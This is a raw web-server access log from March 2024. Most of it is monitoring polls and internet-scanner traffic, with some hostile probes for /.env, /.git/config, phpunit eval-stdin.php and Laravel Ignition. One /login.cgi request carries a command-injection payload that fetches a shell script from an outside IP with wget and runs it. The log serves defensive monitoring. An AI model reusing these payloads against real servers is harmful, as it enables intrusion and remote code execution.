212.91.246.72 - - [04/Mar/2024:23:25:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:26:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:27:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:28:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:29:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.177 - - [04/Mar/2024:23:29:53 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.177 - - [04/Mar/2024:23:29:53 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:30:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:31:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:32:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:32:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:33:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.167 - - [04/Mar/2024:23:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
212.91.246.72 - - [04/Mar/2024:23:34:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:35:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.175 - - [04/Mar/2024:23:36:00 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [04/Mar/2024:23:36:00 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:36:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:37:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:38:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:39:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:39:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
200.53.24.237 - - [04/Mar/2024:23:40:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Mar/2024:23:40:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:41:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:42:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:43:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:43:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:44:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:45:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:46:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:47:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:47:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:48:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.149.192.199 - - [04/Mar/2024:23:49:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
212.91.246.72 - - [04/Mar/2024:23:49:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:50:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:51:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:52:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:53:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:54:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:55:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:56:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Mar/2024:23:57:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
83.168.106.25 - - [04/Mar/2024:23:58:35 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://164.155.205.6/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "hacked-by-matrix"
212.91.246.72 - - [04/Mar/2024:23:58:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [04/Mar/2024:23:58:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Mar/2024:23:59:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Mar/2024:00:01:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
78.153.140.175 - - [05/Mar/2024:00:02:49 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.175 - - [05/Mar/2024:00:02:49 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
185.191.126.213 - - [05/Mar/2024:00:02:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Mar/2024:00:03:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.165.169.131 - - [05/Mar/2024:00:14:32 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
103.149.192.167 - - [05/Mar/2024:00:15:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
31.220.1.83 - - [05/Mar/2024:00:16:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:16:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:16:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:17:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:18:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:18:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:18:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.1.83 - - [05/Mar/2024:00:18:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
205.210.31.46 - - [05/Mar/2024:00:19:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
31.220.1.83 - - [05/Mar/2024:00:19:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
35.203.211.218 - - [05/Mar/2024:00:23:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.180.143.71 - - [05/Mar/2024:00:24:58 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.165.169.131 - - [05/Mar/2024:00:28:17 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
103.149.192.240 - - [05/Mar/2024:00:34:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
198.235.24.120 - - [05/Mar/2024:00:38:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
103.149.192.106 - - [05/Mar/2024:00:39:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
203.113.103.18 - - [05/Mar/2024:00:45:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
94.156.66.125 - - [05/Mar/2024:00:46:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
35.203.210.31 - - [05/Mar/2024:00:49:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
159.203.21.146 - - [05/Mar/2024:00:50:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.21.146 - - [05/Mar/2024:00:50:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.21.146 - - [05/Mar/2024:00:50:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:12 +0100] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
159.203.21.146 - - [05/Mar/2024:00:50:12 +0100] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
159.203.21.146 - - [05/Mar/2024:00:50:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
159.203.21.146 - - [05/Mar/2024:00:50:12 +0100] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:13 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:13 +0100] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:13 +0100] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:13 +0100] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:14 +0100] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:14 +0100] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.21.146 - - [05/Mar/2024:00:50:14 +0100] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.128.232.144 - - [05/Mar/2024:00:52:52 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
103.149.192.241 - - [05/Mar/2024:00:53:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
94.156.66.125 - - [05/Mar/2024:00:54:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
146.19.24.28 - - [05/Mar/2024:00:56:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:00:59:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.144 - - [05/Mar/2024:01:04:22 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
146.19.24.28 - - [05/Mar/2024:01:04:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.165.169.131 - - [05/Mar/2024:01:05:43 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
185.165.169.131 - - [05/Mar/2024:01:06:45 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
165.154.202.146 - - [05/Mar/2024:01:11:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
103.149.192.206 - - [05/Mar/2024:01:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
198.235.24.45 - - [05/Mar/2024:01:15:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.45 - - [05/Mar/2024:01:15:11 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.144 - - [05/Mar/2024:01:18:28 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
146.19.24.28 - - [05/Mar/2024:01:29:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.128.232.144 - - [05/Mar/2024:01:33:41 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
45.128.232.144 - - [05/Mar/2024:01:34:16 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
146.19.24.28 - - [05/Mar/2024:01:35:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.156 - - [05/Mar/2024:01:37:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.156 - - [05/Mar/2024:01:37:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
194.165.16.76 - - [05/Mar/2024:01:38:50 +0100] "\x03" 501 316 "-" "-"
45.128.232.144 - - [05/Mar/2024:01:42:25 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
187.188.157.7 - - [05/Mar/2024:01:44:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.1.45 - - [05/Mar/2024:01:46:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.90 - - [05/Mar/2024:01:51:38 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.128.232.144 - - [05/Mar/2024:01:53:22 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
172.201.194.66 - - [05/Mar/2024:01:56:15 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
167.248.133.123 - - [05/Mar/2024:01:58:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.123 - - [05/Mar/2024:01:58:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.123 - - [05/Mar/2024:01:58:15 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.123 - - [05/Mar/2024:01:58:15 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
102.129.252.157 - - [05/Mar/2024:01:58:46 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "python-requests/2.25.1"
185.142.236.43 - - [05/Mar/2024:01:59:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.43 - - [05/Mar/2024:01:59:37 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.43 - - [05/Mar/2024:01:59:37 +0100] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.43 - - [05/Mar/2024:01:59:38 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.43 - - [05/Mar/2024:01:59:41 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
194.165.16.10 - - [05/Mar/2024:02:01:48 +0100] "\x03" 501 316 "-" "-"
45.128.232.144 - - [05/Mar/2024:02:07:09 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
79.110.62.197 - - [05/Mar/2024:02:09:00 +0100] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
45.128.232.144 - - [05/Mar/2024:02:09:44 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
185.165.169.131 - - [05/Mar/2024:02:11:56 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "fasthttp"
45.128.232.144 - - [05/Mar/2024:02:15:34 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.222 - - [05/Mar/2024:02:17:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.236.176.188 - - [05/Mar/2024:02:18:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
165.227.192.229 - - [05/Mar/2024:02:19:15 +0100] "POST /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:15 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:55 +0100] "GET /script HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:55 +0100] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:55 +0100] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:56 +0100] "GET /users/sign_in HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:56 +0100] "GET /wp-login.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.227.192.229 - - [05/Mar/2024:02:19:56 +0100] "GET /invoker/readonly HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"
165.154.202.146 - - [05/Mar/2024:02:20:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
94.156.66.125 - - [05/Mar/2024:02:25:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
165.154.36.91 - - [05/Mar/2024:02:30:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
165.154.36.91 - - [05/Mar/2024:02:30:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:02:41:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.67 - - [05/Mar/2024:02:57:32 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.67 - - [05/Mar/2024:02:57:32 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [05/Mar/2024:02:59:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
103.149.192.245 - - [05/Mar/2024:03:00:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
198.235.24.134 - - [05/Mar/2024:03:01:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.134 - - [05/Mar/2024:03:01:02 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:06:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
66.175.213.4 - - [05/Mar/2024:03:07:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.104 - - [05/Mar/2024:03:08:00 +0100] "\x16\x03\x01" 501 318 "-" "-"
94.156.66.125 - - [05/Mar/2024:03:09:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
198.235.24.46 - - [05/Mar/2024:03:10:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
172.104.11.34 - - [05/Mar/2024:03:14:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.94 - - [05/Mar/2024:03:18:20 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:26:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:28:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:29:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:29:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.28 - - [05/Mar/2024:03:30:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
79.110.62.197 - - [05/Mar/2024:03:36:14 +0100] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
35.203.210.120 - - [05/Mar/2024:03:46:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
51.159.103.14 - - [05/Mar/2024:03:46:19 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
